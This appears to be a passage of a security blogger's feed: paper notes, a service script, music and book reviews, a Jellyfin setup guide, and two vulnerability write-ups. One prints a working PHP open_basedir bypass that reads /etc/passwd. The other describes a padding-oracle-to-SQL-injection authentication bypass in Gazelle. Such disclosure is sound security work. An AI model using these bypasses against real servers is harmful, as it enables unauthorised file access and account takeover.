+<li>Authors: Joel Kuepper, Andres Erbsen, Jason Gross, Owen Conoly, Chuyue Sun, Samuel Tian, David Wu, Adam Chlipala, Chitchanok Chuengsatiansup, Daniel Genkin, Markus Wagner, Yuval Yarom</li>
+</ul>
+<p>Cryptography is hard, high-performance one even more so: formal proof of
+assembly implementations is horrible to model, and code generation from
+formal proofs are hard to lower to high-performance assembly. The core idea of
+CryptOpt is to treat this as a black box combinatorial optimization problem,
+and bruteforce possible solutions in a smart way against an oracle.</p>
+<p>More precisely:</p>
+<ol>
+<li>start from a known-correct implementation in
+ <a href="https://github.com/mit-plv/fiat-crypto">fiat-crypto</a> (a
+ coq-powered high-level to low-level IR proven translator) low-level IR;</li>
+<li>lower it via a fuzzer-like machinery replacing/reordering operands
+ applying semantics-and-data-constrains-preserving transformations, which has an acceptable
+ search space because:<ul>
+<li>it's straight-line no-aliasing constant-offset-pointers assembly;</li>
+<li>transformations can be templatised, eg. <code>add ≍ clc; adcx</code>;</li>
+</ul>
+</li>
+<li>lift the resulting x64 assembly to fiat-crypto low-level IR;</li>
+<li>use a custom <a href="https://en.wikipedia.org/wiki/E-graph">e-graph</a> based
+ <em>equivalence checker</em> implemented as a mix between an SMT solver and a symbolic-execution engine;</li>
+<li>if the new implementation is correct, benchmark it against the current;
+ fastest one, and keep it if it's outperforming it.</li>
+<li><code>goto 2</code>.</li>
+</ol>
+<p>This approach has a couple of advantages:</p>
+<ul>
+<li>fuzzers are cheaper than highly specialised engineering time</li>
+<li>porting implementations to new hardware is simply a matter of
+ running CryptOpt on it.</li>
+<li>by lifting the assembly to fiat-crypto low-level IR,
+ there is no need to write complex formal proofs,
+ since fiat-crypto is already taking care of those.</li>
+<li>controlling the mutations allows to ensure that
+ the implementation stays side-channel free.</li>
+</ul>
+<p>The main issue though, is that one needs to formally implement
+whatever algorithm to optimize in fiat-crypto, which is not that easy (and
+which the authors of the paper didn't do for libsecp256k1).</p>
+<p>Implementation-wise, the author ran 200k mutations, with 20 initial candidates,
+over 18 Fiat IR primitives, taking between 20 and 40 CPU hours. Interestingly,
+since the equivalence-based verification is <em>slow</em> (between 0.1s and ~300s),
+it's only done once at the end. They found out that "optimization progress is roughly logarithmic
+in the number of mutations." CryptOpt generates code around 1.20 to 2.50 times
+faster than gcc/clang for the same fiat-crypto generated C code. It's not
+faster then OpenSSL (but offers formally verified correctness), but is
+faster than libsecp256k1.</p>
+<p>The paper was <a href="https://iacr.org/submit/files/slides/2023/rwc/rwc2023/85/slides.pdf">presented</a> at <a href="https://rwc.iacr.org/2023/program.php">Real World Crypto 2023</a>,
+and like all good one, it came with an <a href="https://github.com/0xADE1A1DE/CryptOpt">implementation</a></p>Managing a bouncer via OpenRC2023-11-24T16:30:00+01:002023-11-24T16:30:00+01:00jvoisintag:dustri.org,2023-11-24:/b/managing-a-bouncer-via-openrc.html<p>I'm an avid <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat">IRC</a>
+user, and I'm using <a href="https://en.wikipedia.org/wiki/XMPP">XMPP</a> to idle on
+<a href="https://tails.net/support/index.en.html">Tails</a>' chatrooms. Since protocols
+tend to only work when one is connected, they're both running inside a
+<a href="https://github.com/tmux/tmux">tmux</a> session, acting as a
+<a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>.
+But now that my hypervisor is automatically rebooting to apply security updates,
+and during power …</p><p>I'm an avid <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat">IRC</a>
+user, and I'm using <a href="https://en.wikipedia.org/wiki/XMPP">XMPP</a> to idle on
+<a href="https://tails.net/support/index.en.html">Tails</a>' chatrooms. Since protocols
+tend to only work when one is connected, they're both running inside a
+<a href="https://github.com/tmux/tmux">tmux</a> session, acting as a
+<a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>.
+But now that my hypervisor is automatically rebooting to apply security updates,
+and during power cuts via <a href="https://networkupstools.org/">nut</a>,
+I needed a way to automatically restart the bouncer. Since
+it's running in an <a href="https://www.alpinelinux.org/">Alpine Linux</a> container,
+here is my solution in the form of an <a href="https://github.com/OpenRC/openrc">OpenRC</a>
+service script, because I couldn't find one on the internet:</p>
+<div class="codehilite"><pre><span></span><code><span class="ch">#!/sbin/openrc-run</span>
+
+<span class="nv">USER</span><span class="o">=</span>jvoisin
+
+<span class="nv">name</span><span class="o">=</span><span class="s2">"chat"</span>
+<span class="nv">command_user</span><span class="o">=</span><span class="s2">"</span><span class="nv">$USER</span><span class="s2">"</span>
+<span class="nv">command</span><span class="o">=</span>/usr/bin/tmux
+<span class="nv">command_args</span><span class="o">=</span><span class="s2">"new-session -s chat -d '/usr/bin/weechat' \; new-window '/usr/bin/profanity' \; select-window -t -1"</span>
+<span class="nv">pidfile</span><span class="o">=</span><span class="s2">"/run/</span><span class="nv">$SVCNAME</span><span class="s2">.pid"</span>
+
+depend<span class="o">()</span><span class="w"> </span><span class="o">{</span>
+<span class="w"> </span>need<span class="w"> </span>net
+<span class="w"> </span>use<span class="w"> </span>dns<span class="w"> </span>
+<span class="o">}</span><span class="w"> </span>
+
+stop<span class="o">()</span><span class="w"> </span><span class="o">{</span>
+<span class="w"> </span>su<span class="w"> </span><span class="s2">"</span><span class="nv">$USER</span><span class="s2">"</span><span class="w"> </span>-c<span class="w"> </span><span class="s1">'tmux kill-session chat'</span>
+<span class="o">}</span>
+</code></pre></div>Netra - Ingrats2023-11-18T22:45:00+01:002023-11-18T22:45:00+01:00jvoisintag:dustri.org,2023-11-18:/b/netra-ingrats.html<p><a href="https://hypnoticdirgerecords.bandcamp.com/album/ingrats"><img alt="Cover" src="https://dustri.org/b/images/netra_ingrats.jpg"></a></p>
+<p><em>Ingrats</em> ("ungrateful ones" in French) is the 3<sup>rd</sup> album from
+Netra, and it's a very lonely one, for I don't think it has any peers. A mix of
+depressive black metal, trip hop, and jazz à la <a href="https://en.wikipedia.org/wiki/Bohren_%26_der_Club_of_Gore">Bohren & der Club of
+Gore</a> in equal
+measures, bound together with a …</p><p><a href="https://hypnoticdirgerecords.bandcamp.com/album/ingrats"><img alt="Cover" src="https://dustri.org/b/images/netra_ingrats.jpg"></a></p>
+<p><em>Ingrats</em> ("ungrateful ones" in French) is the 3<sup>rd</sup> album from
+Netra, and it's a very lonely one, for I don't think it has any peers. A mix of
+depressive black metal, trip hop, and jazz à la <a href="https://en.wikipedia.org/wiki/Bohren_%26_der_Club_of_Gore">Bohren & der Club of
+Gore</a> in equal
+measures, bound together with a hint of depressive darkwave, resulting
+in a not only surprisingly cohesive and daring record, but also an excessively
+pleasant and honest one.</p>
+<p>Opening with "Gimme a break", a mellow jazzy noir blues vibe where one wants to
+snap in rhythm, things quickly devolve into blast beats, raw screams and
+twisted guitar of "Everything’s Fine", arguably the most black-metal-esque song
+of the album. Albeit it is way more than yet-another-black-metal-track,
+morphing into something more complex, with an eerie piano melody, and some
+almost gothic rock clear singing. The sudden transitions are perfectly
+executed, and the work on the voices is truly delicious, resulting in an
+alienating, impetuous yet melancholic track. "Underneath my words the ruins of
+yours" is a subtle mix of trip-hop and atmospheric post-rock/darkwave,
+pursuing with "Live with It", even more trip-hop, but this time with a
+<a href="https://en.wikipedia.org/wiki/Syncopation">syncopated</a> rhythm, 80s gothic
+rock, clean vocals and acoustic guitars, … it results in something like
+Katatonia doing a feat with <a href="https://en.wikipedia.org/wiki/Gramatik">Gramatik</a>
+and <a href="https://en.wikipedia.org/wiki/Ulver">Ulver</a> period early 2000s.</p>
+<p>Then the calm before the storm, "Infinite bordedom", a one minute interlude of grainy piano under the rain,
+announcing "Don't Keep Me Waiting", some sort of nihilist black metal track,
+but with the noted presence of a saxophone and some clear touches of jazz. The presence of a whispered sample
+from <a href="https://en.wikipedia.org/wiki/The_Minister">L’exercice de l’État</a>
+has a gentle touch of <a href="https://www.metal-archives.com/bands/B%C3%A2%27a/3540445572">Ba'a</a>. Moving on
+to "A Genuinely Benevolent Man", starting with synthesisers,
+then a 4|4 kick resulting in something that could be on a <a href="https://en.wikipedia.org/wiki/VNV_Nation">VNV Nation</a> album.
+Until it decays into something more raw, and when the shrieking vocals
+are showing up, you didn't even realise that we've left the world of the darkwave
+to return into the one of black metal.</p>
+<p>"Paris or Me", dark and rainy, with bits of triptop percussion,
+introducing "Could've, Should've, Would've", with tasteful hints of Depeche Mode, Dead Can Dance,
+post-2000 Velvet Acid Christ, giving it a resolute tasteful darkwave-synth-pop-EBM
+cocktail. The album ends with "Jusqu'au-boutiste", starting with some jazzy piano on a <a href="https://en.wikipedia.org/wiki/Bassline#Walking_bass">walking
+bass</a>, turning into an ultra-saturated tremolo riff with blast beats,
+and both worlds are alternating along the track, only interrupted by a very à
+propos sample from <a href="https://en.wikipedia.org/wiki/Low_Down">Low Down</a>. It goes
+on until the piano gets creepier and creepier, landing into strings,
+morphing into dislocated tip-hop soul, beaching onto calm synthesisers,
+and ending with raw black metal as background for electronic sounds.</p>
+<p>As <a href="https://hypnoticdirgerecords.com/">Hypnotic Dirge Records</a>, the label on which the disc was produced, perfectly
+summarised:</p>
+<blockquote>
+<p>The perfect soundtrack for late-night walks in the city. The material on
+“Ingrats” is an all-out assault on the senses, a bitter pill that must be
+swallowed as an accompaniment for self-reflection. An album which can connect
+emotionally and leave you drained at the end.</p>
+</blockquote>ini_set based open_basedir bypass2023-11-03T16:30:00+01:002023-11-03T16:30:00+01:00jvoisintag:dustri.org,2023-11-03:/b/ini_set-based-open_basedir-bypass.html<p>This one was burned by <a href="https://twitter.com/Blaklis_">Blaklis</a> in 2019,
+by being the expected solution for his
+<a href="https://github.com/Blaklis/my-challenges/tree/master/phuck3">Phuck3</a> challenge
+for InsomniHack Finals 2019, but has been known long before.</p>
+<p>In the words of <a href="https://www.php.net/manual/en/ini.core.php#ini.open-basedir">PHP's documentation</a> on <code>open_basedir</code>:</p>
+<blockquote>
+<p>When a script tries to access the filesystem, for example using include,
+or fopen(), the …</p></blockquote><p>This one was burned by <a href="https://twitter.com/Blaklis_">Blaklis</a> in 2019,
+by being the expected solution for his
+<a href="https://github.com/Blaklis/my-challenges/tree/master/phuck3">Phuck3</a> challenge
+for InsomniHack Finals 2019, but has been known long before.</p>
+<p>In the words of <a href="https://www.php.net/manual/en/ini.core.php#ini.open-basedir">PHP's documentation</a> on <code>open_basedir</code>:</p>
+<blockquote>
+<p>When a script tries to access the filesystem, for example using include,
+or fopen(), the location of the file is checked. When the file is outside the
+specified directory-tree, PHP will refuse to access it. All symbolic links are
+resolved, so it's not possible to avoid this restriction with a symlink. If the
+file doesn't exist then the symlink couldn't be resolved and the filename is
+compared to (a resolved) open_basedir. </p>
+<p>[…]</p>
+<p>open_basedir is just an extra safety net, that is in no way comprehensive, and can therefore not be relied upon when security is needed. </p>
+</blockquote>
+<p>It has been more or less fixed in <a href="https://github.com/php/php-src/commit/ee9e07541f9f07762e3ee781102eea3a4190787c">March 2021</a>,
+then again in <a href="https://github.com/php/php-src/commit/61e98bf35eb939bdd7b27ad7938f8549db2e1551">March 2023</a>,
+and again in <a href="https://github.com/php/php-src/commit/9bcdf219ec6e8d6c2a55f1712b7d868b9129ef8d">July 2023</a>.
+But I wouldn't be surprised if more low-hanging bypasses were lurking ;)</p>
+<p>The crux of the bypass is that php didn't resolve relative paths both in
+<code>ini_set</code> and when checking <code>php_check_open_basedir</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="o"><?</span><span class="nx">php</span>
+<span class="k">echo</span> <span class="nb">ini_get</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">);</span> <span class="c1">// /var/www/html</span>
+<span class="nb">mkdir</span><span class="p">(</span><span class="s1">'./tmp'</span><span class="p">);</span>
+<span class="nb">chdir</span><span class="p">(</span><span class="s1">'./tmp'</span><span class="p">);</span>
+<span class="nb">ini_set</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">,</span> <span class="s1">'..'</span><span class="p">);</span>
+<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><=</span> <span class="mi">24</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
+ <span class="nb">chdir</span><span class="p">(</span><span class="s1">'..'</span><span class="p">);</span>
+<span class="p">}</span>
+<span class="nb">ini_set</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">,</span><span class="s1">'/'</span><span class="p">)</span>
+<span class="k">echo</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"/etc/passwd"</span><span class="p">);</span>
+</code></pre></div>Book review: Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Cracking2023-10-20T18:00:00+02:002023-10-20T18:00:00+02:00jvoisintag:dustri.org,2023-10-20:/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html<p><a href="https://nostarch.com/locksport"><img alt="Locksport's cover" src="https://dustri.org/b/images/locksport.png"></a></p>
+<p>I'm starting to feel guilty about getting ebooks for free from
+<a href="https://nostarch.com/about">No Starch Press</a>, but apparently they're happy to
+send them my way in exchange for a review, so I won't complain.</p>
+<p>Anyway, I got a copy of the early access version <a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking,
+Impressioning …</a></p><p><a href="https://nostarch.com/locksport"><img alt="Locksport's cover" src="https://dustri.org/b/images/locksport.png"></a></p>
+<p>I'm starting to feel guilty about getting ebooks for free from
+<a href="https://nostarch.com/about">No Starch Press</a>, but apparently they're happy to
+send them my way in exchange for a review, so I won't complain.</p>
+<p>Anyway, I got a copy of the early access version <a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking,
+Impressioning, and Safe Cracking</a>!
+It's obviously a book about lockpicking, but, as <em>hinted</em> by its name,
+from the <a href="https://www.lockwiki.com/index.php/Locks port">sport</a> angle.</p>
+<p>I'm not completely clueless when it comes to picking locks, but I've always been
+mediocre at best, since I never really put the effort into practising anything
+but the basics. This was thus a great opportunity for a deeper dive!
+So I got myself a <a href="https://covertinstruments.com/collections/lockpicks/products/genesis-lock-pick">proper set of picks</a>,
+3 cutaway training locks <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-serrated-pins">one with serrated pins</a>,
+<a href="https://www.sparrowslockpicks.com/products/cut-away-lock-spool-pins">with spool pins</a>,
+and <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-check-pins">one with stupid chess pieces pins</a>,
+and a couple of locks/padlocks from my local locksmith, and dove into the book!</p>
+<p>I was a bit curious about its content, since I didn't bother reading the table of contents,
+and was expecting a pile of techniques to open <a href="https://en.wikipedia.org/wiki/Wafer_tumbler_lock">wafer tumbler locks</a>
+in the fastest way possible. But the book is so much more than that, with
+historical perspectives, a bit of legalese, the proper etiquette to participate in lockpicking
+competitions and how to organise one, anecdotes, mechanical details and
+resources for those who <a href="https://en.wikipedia.org/wiki/Starship_Troopers_(film)">would like to know
+more</a>, how to tear
+apart, modify, take care of, and reassemble locks, where to get equipment,
+how to <a href="https://www.lockwiki.com/index.php/Impressioning">impression keys</a>,
+details on <a href="https://en.wikipedia.org/wiki/Lever_tumbler_lock">lever tumbler locks</a>
+and <a href="https://en.wikipedia.org/wiki/Safe">vaults</a>,
+…</p>
+<p>The part about wafer locks, while interesting, doesn't really go much further
+than some basic techniques for entry-level <a href="https://lockwiki.com/index.php/Security_pin#Security_pin_illustrations">security pins</a>,
+but I guess practise is the only way to learn how to handle anything non-trivial anyway.
+On the other hand, the part about lever locks was highly entertaining,
+since those are really weird compared to the <em>usual</em> locks,
+and I didn't know much about them.</p>
+<p>I recently gifted myself a <a href="https://www.sparrowslockpicks.com/products/challenge-vault">Sparrow's challenge vault</a> for my birthday,
+and was thus highly delighted to discover that the book has a whole section
+on <a href="https://en.wikipedia.org/wiki/Safe-cracking">safe manipulation</a>; which is
+fortunate since the instructions coming with the vault are <s>pure garbage</s>
+confusing at best.</p>
+<p>The only issue I had with the book is that while it's full of gorgeous colourful
+pictures, like the small marks left by pins during key impressioning,
+they are unfortunately barely legible on my
+<a href="https://www.pocketbook-int.com/ge/products/pocketbook-inkpad-3">Pocketbook InkPad 3</a>,
+so I'd recommend getting the paperback version if you don't have a 𝖙𝖗𝖚𝖊𝖈𝖔𝖑𝖔𝖗 4𝖐
+𝕳𝕯𝕽 e-reader.</p>
+<p>All in all, it's a really great self-contained book for newcomers and beginners,
+entertaining, detailed, … and doing a tremendous job at making
+lockpicking competitions look cool yet accessible! It was also a nice motivation booster for me to
+tackle harder locks.</p>
+<p>If you already know your way around locks, you might want to look at <a href="https://www.barnesandnoble.com/w/high-security-mechanical-locks-graham-pulford/1111341233">High-Security Mechanical Locks: An
+Encyclopedic
+Reference</a> instead.</p>Authentication bypass on What.CD's Gazelle2023-10-13T19:45:00+02:002023-10-13T19:45:00+02:00jvoisintag:dustri.org,2023-10-13:/b/authentication-bypass-on-whatcds-gazelle.html<p><a href="https://en.wikipedia.org/wiki/What.CD">What.CD</a> has been dead since 2016, and
+hopefully <a href="https://github.com/OPSnet/Gazelle/blob/master/app/Util/Crypto.php">nobody</a>
+is using <a href="https://github.com/WhatCD/Gazelle">Gazelle</a>,
+their "web framework geared towards private BitTorrent tracker" anymore.
+I've been sitting on this one for years, I know I wasn't the only one,
+and it's not the only low-hanging vulnerability lurking there.</p>
+<p>Rolling your own blunt …</p><p><a href="https://en.wikipedia.org/wiki/What.CD">What.CD</a> has been dead since 2016, and
+hopefully <a href="https://github.com/OPSnet/Gazelle/blob/master/app/Util/Crypto.php">nobody</a>
+is using <a href="https://github.com/WhatCD/Gazelle">Gazelle</a>,
+their "web framework geared towards private BitTorrent tracker" anymore.
+I've been sitting on this one for years, I know I wasn't the only one,
+and it's not the only low-hanging vulnerability lurking there.</p>
+<p>Rolling your own blunt is alright, rolling your own authentication scheme
+less so: there is a trivial <a href="https://en.wikipedia.org/wiki/Padding_oracle_attack">padding oracle</a>
+in the <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/encrypt.class.php#L24">homegrown crypto scheme</a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="k">public</span> <span class="k">function</span> <span class="nf">decrypt</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">,</span> <span class="nv">$Key</span> <span class="o">=</span> <span class="nx">ENCKEY</span><span class="p">)</span> <span class="p">{</span>
+ <span class="k">if</span> <span class="p">(</span><span class="nv">$CryptStr</span> <span class="o">!=</span> <span class="s1">''</span><span class="p">)</span> <span class="p">{</span>
+ <span class="nv">$IV</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span>
+ <span class="nv">$CryptStr</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">16</span><span class="p">);</span>
+ <span class="k">return</span> <span class="nb">trim</span><span class="p">(</span><span class="nb">mcrypt_decrypt</span><span class="p">(</span><span class="nx">MCRYPT_RIJNDAEL_128</span><span class="p">,</span> <span class="nv">$Key</span><span class="p">,</span> <span class="nv">$CryptStr</span><span class="p">,</span> <span class="nx">MCRYPT_MODE_CBC</span><span class="p">,</span> <span class="nv">$IV</span><span class="p">));</span>
+ <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
+ <span class="k">return</span> <span class="s1">''</span><span class="p">;</span>
+ <span class="p">}</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>leading to an <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/ajax_start.php#L23-L31">authentication bypass via a SQL injection</a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'session'</span><span class="p">]))</span> <span class="p">{</span>
+ <span class="nv">$LoginCookie</span> <span class="o">=</span> <span class="nv">$Enc</span><span class="o">-></span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'session'</span><span class="p">]);</span>
+<span class="p">}</span>
+<span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">))</span> <span class="p">{</span>
+ <span class="k">list</span><span class="p">(</span><span class="nv">$SessionID</span><span class="p">,</span> <span class="nv">$UserID</span><span class="p">)</span> <span class="o">=</span> <span class="nb">explode</span><span class="p">(</span><span class="s2">"|~|"</span><span class="p">,</span> <span class="nv">$Enc</span><span class="o">-></span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">));</span>
+
+ <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$UserID</span> <span class="o">||</span> <span class="o">!</span><span class="nv">$SessionID</span><span class="p">)</span> <span class="p">{</span>
+ <span class="k">die</span><span class="p">(</span><span class="s1">'Not logged in!'</span><span class="p">);</span>
+ <span class="p">}</span>
+
+ <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$Enabled</span> <span class="o">=</span> <span class="nv">$Cache</span><span class="o">-></span><span class="na">get_value</span><span class="p">(</span><span class="s2">"enabled_</span><span class="si">$UserID</span><span class="s2">"</span><span class="p">))</span> <span class="p">{</span>
+ <span class="k">require</span><span class="p">(</span><span class="nx">SERVER_ROOT</span><span class="o">.</span><span class="s1">'/classes/mysql.class.php'</span><span class="p">);</span> <span class="c1">//Require the database wrapper</span>
+ <span class="nv">$DB</span> <span class="o">=</span> <span class="k">NEW</span> <span class="nx">DB_MYSQL</span><span class="p">;</span> <span class="c1">//Load the database wrapper</span>
+ <span class="nv">$DB</span><span class="o">-></span><span class="na">query</span><span class="p">(</span><span class="s2">"</span>
+<span class="s2"> SELECT Enabled</span>
+<span class="s2"> FROM users_main</span>
+<span class="s2"> WHERE ID = '</span><span class="si">$UserID</span><span class="s2">'"</span><span class="p">);</span>
+ <span class="k">list</span><span class="p">(</span><span class="nv">$Enabled</span><span class="p">)</span> <span class="o">=</span> <span class="nv">$DB</span><span class="o">-></span><span class="na">next_record</span><span class="p">();</span>
+ <span class="nv">$Cache</span><span class="o">-></span><span class="na">cache_value</span><span class="p">(</span><span class="s2">"enabled_</span><span class="si">$UserID</span><span class="s2">"</span><span class="p">,</span> <span class="nv">$Enabled</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
+ <span class="p">}</span>
+<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
+ <span class="k">die</span><span class="p">(</span><span class="s1">'Not logged in!'</span><span class="p">);</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Conveniently, the oracle doesn't touch the database, is completely stateless,
+and only shows up in the httpd/reverse-proxy's logs, which shouldn't log the cookies'
+content, making forensic analysis nigh impossible. Once you're admin, there are
+a bunch of available SQL injections, like in
+<a href="https://github.com/WhatCD/Gazelle/blob/master/sections/reportsv2/takeresolve.php"><code>takerevolve.php</code></a>.
+From there, remote code execution is doable, but left as an exercise for the
+reader.</p>Video acceleration in Jellyfin inside a Proxmox container2023-10-01T22:15:00+02:002023-10-01T22:15:00+02:00jvoisintag:dustri.org,2023-10-01:/b/video-acceleration-in-jellyfin-inside-a-proxmox-container.html<p>For various reasons, including "video decoding is hard", "your web browser hates you"
+and "watching movies on a phone over 3G is a basic human necessity",
+enabling hardware-accelerated video decoding in <a href="https://jellyfin.org">Jellyfin</a>
+is a desirable goal if you don't want your CPU to set your house on fire. </p>
+<p>To attain …</p><p>For various reasons, including "video decoding is hard", "your web browser hates you"
+and "watching movies on a phone over 3G is a basic human necessity",
+enabling hardware-accelerated video decoding in <a href="https://jellyfin.org">Jellyfin</a>
+is a desirable goal if you don't want your CPU to set your house on fire. </p>
+<p>To attain it, one can mess around <a href="https://github.com/ddimick/proxmox-lxc-idmapper">cryptic gid mappings</a>,
+but granting every user on the hypervisor the right to read/write <code>/dev/dri/renderD128</code> and
+<code>/dev/dri/card0</code> is way easier, and it looks like this:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>><span class="w"> </span>/etc/udev/rules.d/99-intel-chmod666.rules<span class="w"> </span><<<span class="w"> </span><span class="s1">'EOF'</span>
+<span class="go">KERNEL=="renderD128", MODE="0666"</span>
+<span class="go">KERNEL=="card0", MODE="0666"</span>
+<span class="go">EOF</span>
+<span class="gp"># </span>udevadm<span class="w"> </span>control<span class="w"> </span>--reload-rules<span class="w"> </span><span class="o">&&</span><span class="w"> </span>udevadm<span class="w"> </span>trigger
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>It doesn't really worsen security, since:
+- the devices are only mounted inside my jellyfin container, which would have
+ the same privileges as if I used gid mapping.
+- odds are that an attacker able to get a shell on the hypervisor wouldn't
+ really need to have r/w access to the two devices to escalate their
+ privileges anyway, since they would either be:
+ - root already to escape from a container
+ - root already to escape from a vm
+ - whatever proxmox user and likely able to escalate to <code>root</code> trivially
+ - other users are sandboxed via systemd and/or seccomp.</p>
+<p>Speaking of mounting things inside the container:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>><span class="w"> </span>/etc/pve/lxc/114.conf<span class="w"> </span><<<span class="w"> </span><span class="s1">'EOF'</span>
+<span class="go">lxc.cgroup2.devices.allow: c 226:0 rwm</span>
+<span class="go">lxc.cgroup2.devices.allow: c 226:128 rwm</span>
+<span class="go">lxc.mount.entry: /dev/dri dev/dri none bind,optional,create=dir</span>
+<span class="go">lxc.mount.entry: /dev/dri/renderD128 dev/renderD128 none bind,optional,create=file</span>
+<span class="go">EOF</span>
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>You can now run <code>vainfo</code> inside the container and be delighted by the
+presence of the <a href="https://en.wikipedia.org/wiki/Video_Acceleration_API">VA-API</a> version number:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>vainfo<span class="w"> </span><span class="m">2</span>>/dev/null<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">1</span>
+<span class="go">libva info: VA-API version 1.17.0</span>
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>The last step is to tick all the boxes in <a href="https://jellyfin.org/docs/general/administration/hardware-acceleration/">Jellyfin's
+preferences</a>
+and you're good to go. Don't forget to make some space on the disk for the
+transcoding cache, at least until <a href="https://github.com/jellyfin/jellyfin/pull/8744">this</a>
+makes its way into a release.</p>Paper notes: Breaking Bad: Quantifying the Addiction of Web Elements to JavaScript2023-09-26T17:15:00+02:002023-09-26T17:15:00+02:00jvoisintag:dustri.org,2023-09-26:/b/paper-notes-breaking-bad-quantifying-the-addiction-of-web-elements-to-javascript.html<p><a href="https://arxiv.org/pdf/2301.10597.pdf">PDF</a>, <a href="https://dustri.org/b/files/papers/breaking_bad.pdf">local mirror</a></p>
+<p>More or less all conversations involving the <a href="https://www.torproject.org/download/">tor browser</a>
+will at some point contain the following line: "No, javascript isn't disabled
+by default because too many sites would break. You can always crank the
+security slider all the way up if you want tho."</p>
+<p>We all agree …</p><p><a href="https://arxiv.org/pdf/2301.10597.pdf">PDF</a>, <a href="https://dustri.org/b/files/papers/breaking_bad.pdf">local mirror</a></p>
+<p>More or less all conversations involving the <a href="https://www.torproject.org/download/">tor browser</a>
+will at some point contain the following line: "No, javascript isn't disabled
+by default because too many sites would break. You can always crank the
+security slider all the way up if you want tho."</p>
+<p>We all agree that javascript enables all sorts of despicable behaviours making
+the web a nightmare-material privacy/security cesspit and completely
+inscrutable to a lot of users, so having research done
+to quantify how to make it a better place for everyone is always more than welcome.</p>
+<p>The main idea of the paper is to load pages from the <a href="https://hispar.cs.duke.edu/">Hispar
+set</a> with and without <code>javascript.enabled</code> set,
+via <a href="https://pptr.dev">Puppeteer</a>, and to perform
+magic human-assisted smart diffing to detect user-perceived/perceivable
+breakages. </p>
+<p>The paper is full of fancy graphs and analysis, but the <a href="https://en.wikipedia.org/wiki/TL;DR">tldr</a> is:</p>
+<blockquote>
+<p>We discover that 43 % of web pages are not strictly dependent on JavaScript
+and that more than 67 % of pages are likely to be usable as long as the visitor
+only requires the content from the main section of the page, for which the user
+most likely reached the page, while reducing the number of tracking requests by
+85 % on average.</p>
+</blockquote>
+<p>An interesting take is that the usage of javascript framework is the main
+source of breakage, since <s>a lot</s> all of them result in completely
+unusable websites when javascript is disabled. Moreover, anecdotal data seems
+to suggest that the bigger a company is, the more their website is going to
+break when javascript is disabled.</p>
+<p>And like every decent paper, it comes with the <a href="https://gitlab.inria.fr/Spirals/breaking-bad">related code and data published</a>.</p>Snuffleupagus 0.10.0 - Babar the Elephant2023-09-20T15:25:00+02:002023-09-20T15:25:00+02:00jvoisintag:dustri.org,2023-09-20:/b/snuffleupagus-0100-babar-the-elephant.html<p><a href="https://snuffleupagus.readthedocs.org"><img alt="snuffleupagus logo" src="https://dustri.org/b/images/sp.png"></a></p>
+<p>I just published a new release of
+<a href="https://github.com/jvoisin/snuffleupagus/releases/tag/v0.10.0">Snuffleupagus</a>,
+the hardening module for php7+ and php8+,
+version <code>0.9.0</code>, codename "Babar the Elephant",
+named the <a href="https://en.wikipedia.org/wiki/Babar_the_Elephant">eponymous character</a>.
+The main new feature is the PHP8.3 support, but there are a couple of
+quality-of-life improvements for people using Snuffleupagus with fuzzers …</p><p><a href="https://snuffleupagus.readthedocs.org"><img alt="snuffleupagus logo" src="https://dustri.org/b/images/sp.png"></a></p>
+<p>I just published a new release of
+<a href="https://github.com/jvoisin/snuffleupagus/releases/tag/v0.10.0">Snuffleupagus</a>,
+the hardening module for php7+ and php8+,
